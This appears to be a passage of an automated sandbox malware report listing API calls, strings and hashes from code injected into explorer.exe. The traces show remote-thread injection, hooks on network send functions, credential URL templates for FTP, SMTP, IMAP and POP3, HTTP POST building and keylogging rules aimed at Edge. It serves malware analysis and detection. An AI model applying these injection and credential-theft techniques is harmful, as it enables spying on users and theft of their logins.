GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00B419C5
GetProcAddress.KERNEL32(00000000), ref: 00B419CC
ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00B419E2
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00B41A0C
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B41A1F
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00B41A26
Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00B41A2D
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00B41A41
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00B41A58
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00B41A65
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00B41A6B
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00B41A71
CloseHandle.KERNEL32(00000000,?,00000000), ref: 00B41A74

Strings

atan, xrefs: 00B419BB
microsoftedgecp.exe, xrefs: 00B4181D
opera_shared_counter, xrefs: 00B4198B
ntdll, xrefs: 00B419C0

Memory Dump Source

Source File: 0000000F.00000002.4138340959.0000000000B41000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b41000_explorer.jbxd

Yara matches

Similarity

API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
String ID: atan$microsoftedgecp.exe$ntdll$opera_shared_counter
API String ID: 1066286714-4141090125
Opcode ID: 37133d54c06bdb4dfbaa8e3a5c00b10f81c029a6323d3d804cd21d801191b3d0
Instruction ID: fec5856f6fcc9ab00adf746741c7a27db3dc5a39df0d4eaa4d85d7cc6e74e199
Opcode Fuzzy Hash: 37133d54c06bdb4dfbaa8e3a5c00b10f81c029a6323d3d804cd21d801191b3d0
Instruction Fuzzy Hash: 4A619B35605304AFD710DF689C84E6BBBECFF8AB50F080A59F959A3251DB70DB448B62

Function 00B4263E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 68
encryptionstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00B4265A
CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00B42672
lstrlen.KERNEL32(?,00000000), ref: 00B4267A
CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00B42685
CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 00B4269F
wsprintfA.USER32 ref: 00B426B6
CryptDestroyHash.ADVAPI32(?), ref: 00B426CF
CryptReleaseContext.ADVAPI32(?,00000000), ref: 00B426D9

Strings

%02X, xrefs: 00B426B0

Memory Dump Source

Source File: 0000000F.00000002.4138340959.0000000000B41000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b41000_explorer.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
String ID: %02X
API String ID: 3341110664-436463671
Opcode ID: 1a869b16babc9d231489b4e6a608bb0f607b93706abbfe7e29c5327ab8fad698
Instruction ID: b33b4161958eabe4fc047403a7e1a431ae3d5fb1dab2567fe82030e3fde2c0a3
Opcode Fuzzy Hash: 1a869b16babc9d231489b4e6a608bb0f607b93706abbfe7e29c5327ab8fad698
Instruction Fuzzy Hash: 11112B75900108BFDB119B95EC88FAEBFFCFB45B41F1441A5F605E2260DA714F01AB60

Function 00B41B17 Relevance: 6.1, APIs: 4, Instructions: 101
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlMoveMemory.NTDLL(?,?,?), ref: 00B41B4E
LoadLibraryA.KERNEL32(?,00B44434,00000000,00000000,74DF2EE0,00000000,00B41910,?,?,?,00000001,?,00000000), ref: 00B41B76
GetProcAddress.KERNEL32(00000000,-00000002), ref: 00B41BA3
LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00B41BF4

Memory Dump Source

Source File: 0000000F.00000002.4138340959.0000000000B41000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b41000_explorer.jbxd

Yara matches

Similarity

API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
String ID:
API String ID: 3827878703-0
Opcode ID: ff5bdd2ab6ebabf73a0f4711d39ca826c3b877fc3337be343ac1b2ff4d1293d9
Instruction ID: f1b5ba904ac314331faaf8a77af65b673bf1199fe885ea503bef4ddb57ce67fd
Opcode Fuzzy Hash: ff5bdd2ab6ebabf73a0f4711d39ca826c3b877fc3337be343ac1b2ff4d1293d9
Instruction Fuzzy Hash: AD319E75B00215ABCB24CF2DCCC4B76B7E8FF15315B1449ACE886CB601E731EA859BA4

Function 00B41332 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 94
libraryloadersleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B42861: GetProcessHeap.KERNEL32(00000008,0000A000,00B410CC), ref: 00B42864
Part of subcall function 00B42861: RtlAllocateHeap.NTDLL(00000000), ref: 00B4286B

GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?,00B4109E,?,00B41010), ref: 00B4134A
GetCurrentProcessId.KERNEL32(00000003,?,00B4109E,?,00B41010), ref: 00B4135B
wsprintfA.USER32 ref: 00B41372

Part of subcall function 00B4263E: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00B4265A
Part of subcall function 00B4263E: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00B42672
Part of subcall function 00B4263E: lstrlen.KERNEL32(?,00000000), ref: 00B4267A
Part of subcall function 00B4263E: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00B42685
Part of subcall function 00B4263E: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 00B4269F
Part of subcall function 00B4263E: wsprintfA.USER32 ref: 00B426B6
Part of subcall function 00B4263E: CryptDestroyHash.ADVAPI32(?), ref: 00B426CF
Part of subcall function 00B4263E: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00B426D9

CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00B41389
GetLastError.KERNEL32 ref: 00B4138F
Sleep.KERNEL32(000001F4), ref: 00B413A1

Part of subcall function 00B424D5: GetCurrentProcessId.KERNEL32 ref: 00B424E7
Part of subcall function 00B424D5: GetCurrentThreadId.KERNEL32 ref: 00B424EF
Part of subcall function 00B424D5: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00B424FF
Part of subcall function 00B424D5: Thread32First.KERNEL32(00000000,0000001C), ref: 00B4250D
Part of subcall function 00B424D5: CloseHandle.KERNEL32(00000000), ref: 00B42566

GetModuleHandleA.KERNEL32(ws2_32.dll,send), ref: 00B413B8
GetProcAddress.KERNEL32(00000000), ref: 00B413BF
GetModuleHandleA.KERNEL32(ws2_32.dll,WSASend), ref: 00B413E4
GetProcAddress.KERNEL32(00000000), ref: 00B413EB

Part of subcall function 00B41DE3: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 00B41E1D

RtlExitUserThread.NTDLL(00000000), ref: 00B4141D

Strings

%s%d%d%d, xrefs: 00B4136C
WSASend, xrefs: 00B413DA
send, xrefs: 00B413AE
ws2_32.dll, xrefs: 00B413B3, 00B413DF

Memory Dump Source

Source File: 0000000F.00000002.4138340959.0000000000B41000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b41000_explorer.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$CreateCurrentHandleModuleProcess$AddressContextHeapProcThreadwsprintf$AcquireAllocateCloseDataDestroyErrorExitFileFirstLastMemoryMoveMutexNameParamReleaseSleepSnapshotThread32Toolhelp32Userlstrlen
String ID: %s%d%d%d$WSASend$send$ws2_32.dll
API String ID: 706757162-1430290102
Opcode ID: ba47c6c144f6daf6e542d73ef8737b4e0dcd8e1364e03c9ed819256455a38078
Instruction ID: 5d957d5588b1c1dd946c75e039cf51a4ae199ae8afa40716936e8124a73a53ce
Opcode Fuzzy Hash: ba47c6c144f6daf6e542d73ef8737b4e0dcd8e1364e03c9ed819256455a38078
Instruction Fuzzy Hash: 4731A435740214BBCB106FA4DD0AB5E3BE9FF06B41F184594FA05A73A1CFB58B51AB90

Function 00B41647 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 91
stringnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlen.KERNEL32(00B44220,?,?), ref: 00B41679
lstrlen.KERNEL32(?), ref: 00B41686
getpeername.WS2_32(?,?,?), ref: 00B416A0
inet_ntoa.WS2_32(?), ref: 00B416B1
htons.WS2_32(?), ref: 00B416BF
wsprintfA.USER32 ref: 00B41725

Strings

imap://%s:%s@%s:%d, xrefs: 00B416FA
smtp://%s:%s@%s:%d, xrefs: 00B416F3, 00B41723
ftp://%s:%s@%s:%d, xrefs: 00B41708
pop3://%s:%s@%s:%d, xrefs: 00B41701

Memory Dump Source

Source File: 0000000F.00000002.4138340959.0000000000B41000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b41000_explorer.jbxd

Yara matches

Similarity

API ID: lstrlen$getpeernamehtonsinet_ntoawsprintf
String ID: ftp://%s:%s@%s:%d$imap://%s:%s@%s:%d$pop3://%s:%s@%s:%d$smtp://%s:%s@%s:%d
API String ID: 3379139566-1703351401
Opcode ID: 275d9f17de46e4e09467f43ae8ed35e6c55e5da2686338ce19406b22a2c167df
Instruction ID: d730871699b00737522296f55953012b3758abd428333727bdbabbcdd0ae830f
Opcode Fuzzy Hash: 275d9f17de46e4e09467f43ae8ed35e6c55e5da2686338ce19406b22a2c167df
Instruction Fuzzy Hash: F721B2B6E00219ABDF105FAD8D885BE7AEDEF45701B1845F5E904E3211DA34CF80BA60

Function 00B41752 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,sscanf,?,?,?,00B41539,?,?,?,00B4144B,?), ref: 00B41763
GetProcAddress.KERNEL32(00000000), ref: 00B4176A
RtlZeroMemory.NTDLL(00B44228,00000104), ref: 00B41788
RtlZeroMemory.NTDLL(00B44118,00000104), ref: 00B41790
RtlZeroMemory.NTDLL(00B44330,00000104), ref: 00B41798
RtlZeroMemory.NTDLL(00B44000,00000104), ref: 00B417A1

Strings

ntdll.dll, xrefs: 00B4175A
%s%s%s%s, xrefs: 00B417B3
sscanf, xrefs: 00B41755

Memory Dump Source

Source File: 0000000F.00000002.4138340959.0000000000B41000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b41000_explorer.jbxd

Yara matches

Similarity

API ID: MemoryZero$AddressHandleModuleProc
String ID: %s%s%s%s$ntdll.dll$sscanf
API String ID: 1490332519-278825019
Opcode ID: 44e1c0aeef004f6ef396bd63fd74ea8edc650139613e176379d372d3937f2907
Instruction ID: 2964a528c3673aa7cf9d8b33a207ffe3c12e45cd1c8564717569cac4757ac611
Opcode Fuzzy Hash: 44e1c0aeef004f6ef396bd63fd74ea8edc650139613e176379d372d3937f2907
Instruction Fuzzy Hash: 01F0896278072C33812023AA7C06F57BDDCD656FE631A02E1B60463261DED56B1065B5

Function 00B424D5 Relevance: 15.1, APIs: 10, Instructions: 51
threadprocessinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00B424E7
GetCurrentThreadId.KERNEL32 ref: 00B424EF
CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00B424FF
Thread32First.KERNEL32(00000000,0000001C), ref: 00B4250D
OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 00B4252C
SuspendThread.KERNEL32(00000000), ref: 00B4253C
CloseHandle.KERNEL32(00000000), ref: 00B4254B
Thread32Next.KERNEL32(00000000,0000001C), ref: 00B4255B
CloseHandle.KERNEL32(00000000), ref: 00B42566

Memory Dump Source

Source File: 0000000F.00000002.4138340959.0000000000B41000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b41000_explorer.jbxd

Yara matches

Similarity

API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
String ID:
API String ID: 1467098526-0
Opcode ID: d557c3a34fafbede8c35d15c368f64cc731cdfec4f606fcd75202546aad6fbfe
Instruction ID: 5d71c84efd42748ecef2d2b715f91f550ea8b3b00f581195cf6a98ffd36fbafe
Opcode Fuzzy Hash: d557c3a34fafbede8c35d15c368f64cc731cdfec4f606fcd75202546aad6fbfe
Instruction Fuzzy Hash: 5A115E75404211EFD7119F60AC5DB6EBBF8FF96B41F080659F64193250DB308B49ABA2

Function 00B41F4A Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 283
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B42861: GetProcessHeap.KERNEL32(00000008,0000A000,00B410CC), ref: 00B42864
Part of subcall function 00B42861: RtlAllocateHeap.NTDLL(00000000), ref: 00B4286B

Part of subcall function 00B427E2: lstrlen.KERNEL32(00B440DA,?,00000000,00000000,00B41F86,74DE8A60,00B440DA,00000000), ref: 00B427EA
Part of subcall function 00B427E2: MultiByteToWideChar.KERNEL32(00000000,00000000,00B440DA,00000001,00000000,00000000), ref: 00B427FC

Part of subcall function 00B42374: RtlZeroMemory.NTDLL(?,00000018), ref: 00B42386

RtlZeroMemory.NTDLL(?,0000003C), ref: 00B41FE2
wsprintfW.USER32 ref: 00B4211B
wsprintfW.USER32 ref: 00B42186
RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00B42250

Strings

POST, xrefs: 00B420CC
Host: %s, xrefs: 00B42180
Content-Type: application/x-www-form-urlencoded, xrefs: 00B421AA
Accept: */*Referer: %S, xrefs: 00B42111

Memory Dump Source

Source File: 0000000F.00000002.4138340959.0000000000B41000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b41000_explorer.jbxd

Yara matches

Similarity

API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
API String ID: 4204651544-1701262698
Opcode ID: 6df755f394500850f2ce410eb9d3dde3da5d0193a7dba5b309fac055c1e993ad
Instruction ID: b239189c7ceb306a67602433fc9220cb866bc1d3a6e269c813ca5b92a87e57b0
Opcode Fuzzy Hash: 6df755f394500850f2ce410eb9d3dde3da5d0193a7dba5b309fac055c1e993ad
Instruction Fuzzy Hash: 3AA16875608301AFD7209F68D885A2BBBE8FF89740F54096DF985D3361DA70DF04AB62

Function 00B425AD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcess.KERNEL32(00000400,00000000,?,74DEE800,?,?,microsoftedgecp.exe,00B41287), ref: 00B425BF
IsWow64Process.KERNEL32(000000FF,?), ref: 00B425D1
IsWow64Process.KERNEL32(00000000,?), ref: 00B425E4
CloseHandle.KERNEL32(00000000), ref: 00B425FA

Strings

microsoftedgecp.exe, xrefs: 00B425AD

Memory Dump Source

Source File: 0000000F.00000002.4138340959.0000000000B41000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b41000_explorer.jbxd

Yara matches

Similarity

API ID: Process$Wow64$CloseHandleOpen
String ID: microsoftedgecp.exe
API String ID: 331459951-1475183003
Opcode ID: d6a90ca35b1b8a4c3e53c82d558cf7c3ca933c380a6106a8cefd49133614752b
Instruction ID: 4ca6adc8218ed93f7b01407d9cdb21ddac6bec0c1b77f75795d4533443d90caf
Opcode Fuzzy Hash: d6a90ca35b1b8a4c3e53c82d558cf7c3ca933c380a6106a8cefd49133614752b
Instruction Fuzzy Hash: 15F03075942618FF9B10DF949D989EE77ECEB02655B5803AAF90493240DB314F04F6A4

Analysis Process: explorer.exePID: 412, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	8.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	9
Total number of Limit Nodes:	2

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0011355C Relevance: 1.6, APIs: 1, Instructions: 73
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 001135D8

Memory Dump Source

Source File: 00000010.00000002.4137644244.0000000000111000.00000040.80000000.00040000.00000000.sdmp, Offset: 00111000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_111000_explorer.jbxd

Yara matches

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
Instruction ID: 8ddc68f57b64bc19337205630927bc3d17bc1b928bd7f62644af2135c8f77e67
Opcode Fuzzy Hash: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
Instruction Fuzzy Hash: B111C430615E095FEB5CFBB8989D2B937A1EB24301F54013AA429C76A5DB398A80C701

Function 00113220 Relevance: 7.7, APIs: 5, Instructions: 241
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00113266
Process32First.KERNEL32 ref: 00113289
Process32Next.KERNEL32 ref: 00113532
CloseHandle.KERNELBASE ref: 00113543
SleepEx.KERNELBASE ref: 0011354E

Memory Dump Source

Source File: 00000010.00000002.4137644244.0000000000111000.00000040.80000000.00040000.00000000.sdmp, Offset: 00111000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_111000_explorer.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
String ID:
API String ID: 2482764027-0
Opcode ID: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
Instruction ID: dd0da7d39569dec89635c487e04e7ac08a6f59abdfd467c401fbcf33bce1dc22
Opcode Fuzzy Hash: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
Instruction Fuzzy Hash: F18143312186088FEB1AEF54EC58BEBB7A1FB50740F44466AE453C7164EF78DA44CB81

Function 0011A048 Relevance: 4.7, APIs: 3, Instructions: 223
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 0011A147
VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-0000000E), ref: 0011A1BB
VirtualProtect.KERNELBASE ref: 0011A1D9

Memory Dump Source

Source File: 00000010.00000002.4137644244.0000000000117000.00000040.80000000.00040000.00000000.sdmp, Offset: 00117000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_117000_explorer.jbxd

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
Instruction ID: bbafcfb999a9ba32b3b885fe3cdfdab83207de1524ecb9580b7ca717c01bba23
Opcode Fuzzy Hash: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
Instruction Fuzzy Hash: 2B516C31359A1D1ACB2CAA389CD46F5BBC1EF59325F94073AD48AC3285D759D8C68383

Analysis Process: explorer.exePID: 1340, Parent PID: 2580COMMON

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00A31016 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 193
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00A32724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,00A329F3,-00000001,00A3128C), ref: 00A32731

Part of subcall function 00A32A09: GetProcessHeap.KERNEL32(00000008,0000A000,00A310BF), ref: 00A32A0C
Part of subcall function 00A32A09: RtlAllocateHeap.NTDLL(00000000), ref: 00A32A13

RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00A31038
RtlMoveMemory.NTDLL(00000000,?,?), ref: 00A3106C
NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00A31075
GetCurrentProcessId.KERNEL32(?,00A31010), ref: 00A3107B
wsprintfA.USER32 ref: 00A310E7
RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 00A31155
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A31160
Process32First.KERNEL32(00000000,?), ref: 00A3117F
CharLowerA.USER32(?), ref: 00A31199
lstrcmpiA.KERNEL32(?,explorer.exe), ref: 00A311B5
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00A31212
Process32Next.KERNEL32(00000000,00000128), ref: 00A3126C
CloseHandle.KERNEL32(00000000), ref: 00A3127F
Sleep.KERNELBASE(000003E8), ref: 00A3129F

Strings

|:|, xrefs: 00A31125
microsoftedgecp.exe, xrefs: 00A31208
explorer.exe, xrefs: 00A311AB
%s%s, xrefs: 00A310E1
keylog_rules=, xrefs: 00A3110D

Memory Dump Source

Source File: 00000011.00000002.4138133201.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_a31000_explorer.jbxd

Similarity

API ID: MemoryMove$HeapProcessProcess32lstrcmpi$AllocateCharCloseCreateCurrentFirstHandleLowerNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtualwsprintf
String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
API String ID: 3206029838-2805246637
Opcode ID: 4e9c04818b764ca5a870278afbf051fbf876cdeb1d726315fc7a6daa8fc0b599
Instruction ID: e62be71cc4617bdc9e2df5264b0daa7128ae412ad49f69f2262cfb138b7c7f6c
Opcode Fuzzy Hash: 4e9c04818b764ca5a870278afbf051fbf876cdeb1d726315fc7a6daa8fc0b599
Instruction Fuzzy Hash: D051F971A083019FCB18EFF4DD85ABB77A9FF45740F000628F955872A1EB359E468B61

Function 00A310A5 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 151
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00A32A09: GetProcessHeap.KERNEL32(00000008,0000A000,00A310BF), ref: 00A32A0C
Part of subcall function 00A32A09: RtlAllocateHeap.NTDLL(00000000), ref: 00A32A13

wsprintfA.USER32 ref: 00A310E7

Part of subcall function 00A3276D: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 00A32777
Part of subcall function 00A3276D: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,00A310FE), ref: 00A32789

RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 00A31155
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A31160
Process32First.KERNEL32(00000000,?), ref: 00A3117F
CharLowerA.USER32(?), ref: 00A31199
lstrcmpiA.KERNEL32(?,explorer.exe), ref: 00A311B5
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00A31212
Process32Next.KERNEL32(00000000,00000128), ref: 00A3126C
CloseHandle.KERNEL32(00000000), ref: 00A3127F
Sleep.KERNELBASE(000003E8), ref: 00A3129F

Strings

|:|, xrefs: 00A31125
microsoftedgecp.exe, xrefs: 00A31208
explorer.exe, xrefs: 00A311AB
%s%s, xrefs: 00A310E1
keylog_rules=, xrefs: 00A3110D

Memory Dump Source

Source File: 00000011.00000002.4138133201.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_a31000_explorer.jbxd

Similarity

API ID: FileHeapProcess32lstrcmpi$AllocateCharCloseCreateFirstHandleLowerMappingMemoryMoveNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
API String ID: 3018447944-2805246637
Opcode ID: 374791c8e0304b29853138f8d2d7dccbaffb8232cc7efe793fe26ee65a9a7335
Instruction ID: ff5d25ca12b43a898824219a3bca490a11b70e254c587e6855f7add5084a1991
Opcode Fuzzy Hash: 374791c8e0304b29853138f8d2d7dccbaffb8232cc7efe793fe26ee65a9a7335
Instruction Fuzzy Hash: E041C6716083015FDB18EFF49D85ABF77A9EF85744F000A28F956872E1EB349E068B61

Function 00A39AE0 Relevance: 6.2, APIs: 4, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000011.00000002.4138133201.0000000000A38000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A38000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_a38000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 347baeb57d02b389b76709ebf1a487e83cb2a3edea4ea9fc7bad12da36fac416
Instruction ID: dcf1e72348de98742f1c2b082615ff171c0c3c8e5e70dd98d76220dd1991c37f
Opcode Fuzzy Hash: 347baeb57d02b389b76709ebf1a487e83cb2a3edea4ea9fc7bad12da36fac416
Instruction Fuzzy Hash: B351E471A542524ED7219E78DCC07A2F7A4EB52320F280739E5E6CB3C6E7E45C06C7A0

Function 00A3276D Relevance: 3.0, APIs: 2, Instructions: 23
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 00A32777
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,00A310FE), ref: 00A32789

Memory Dump Source

Source File: 00000011.00000002.4138133201.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_a31000_explorer.jbxd

Similarity

API ID: File$MappingOpenView
String ID:
API String ID: 3439327939-0
Opcode ID: 3974d0c4c34ad6474f3586752a9fa964b75ec9fea9726ec4f0e324b09bac49c9
Instruction ID: 819a18cf1c87264edc3d70e70fa1ac4d98f5c312a9d92fdd89cda1d052fc4fdb
Opcode Fuzzy Hash: 3974d0c4c34ad6474f3586752a9fa964b75ec9fea9726ec4f0e324b09bac49c9
Instruction Fuzzy Hash: 4BD01732709231BBE7389BBB6C0CF87AE9DDF86AE1B010025B50DD2150D6608811C2F0

Function 00A3275A Relevance: 3.0, APIs: 2, Instructions: 8
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

UnmapViewOfFile.KERNEL32(00000000,?,00A3129A,00000001), ref: 00A3275E
CloseHandle.KERNELBASE(?,?,00A3129A,00000001), ref: 00A32765

Memory Dump Source

Source File: 00000011.00000002.4138133201.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_a31000_explorer.jbxd

Similarity

API ID: CloseFileHandleUnmapView
String ID:
API String ID: 2381555830-0
Opcode ID: 18c715c93cd34100283f9cb2e5114f13c5f0a04b88ae8955454cab8b5705996c
Instruction ID: a2473d42f14b086bb20d1673ebbdeaa4597d374709832cd331544594150d15c8
Opcode Fuzzy Hash: 18c715c93cd34100283f9cb2e5114f13c5f0a04b88ae8955454cab8b5705996c
Instruction Fuzzy Hash: 1FB0123340D03097CB1CE7B47D0C8DF3E18EE4B2213050145F10E8102047280E4386E8

Function 00A32A09 Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,0000A000,00A310BF), ref: 00A32A0C
RtlAllocateHeap.NTDLL(00000000), ref: 00A32A13

Memory Dump Source

Source File: 00000011.00000002.4138133201.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_a31000_explorer.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: c3179aa5313d51b1001544ed1dcf1b158ead25b312e2ceb8289c860523571044
Instruction ID: 30a7af838e563db3705b8e7721cea680d55e7c5e236527240750d2ab72e411a7
Opcode Fuzzy Hash: c3179aa5313d51b1001544ed1dcf1b158ead25b312e2ceb8289c860523571044
